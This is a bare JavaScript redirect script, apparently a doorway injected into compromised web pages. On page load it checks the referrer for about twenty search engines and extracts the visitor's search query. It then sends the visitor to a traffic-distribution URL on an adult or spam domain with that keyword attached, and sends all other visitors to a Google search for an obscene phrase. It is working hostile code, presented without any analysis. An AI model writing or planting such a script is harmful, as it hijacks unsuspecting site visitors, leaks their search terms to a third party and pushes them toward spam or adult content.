function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("live.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("eureka.com.")!=-1)t="q";
if(r.indexOf("lycos.com.")!=-1)t="query";
if(r.indexOf("hotbot.com.")!=-1)t="MT";
if(r.indexOf("infoseek.com.")!=-1)t="qt";
if(r.indexOf("webcrawler.")!=-1)t="searchText";
if(r.indexOf("excite.")!=-1)t="search";
if(r.indexOf("netscape.com.")!=-1)t="search";
if(r.indexOf("mamma.com.")!=-1)t="query";
if(r.indexOf("alltheweb.com.")!=-1)t="query";
if(r.indexOf("northernlight.com.")!=-1)t="qr";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
{
window.location="http://lesbian-hotties.biz/tds/tds.php?out=google2&ch=1&link=1&key="+r.substring(q+2+t.length).split("&")[0];
}
else
{
var so="FUCK oFF";
window.location="http://www.google.com/search?q="+so;
}
}
window.onFocus = f()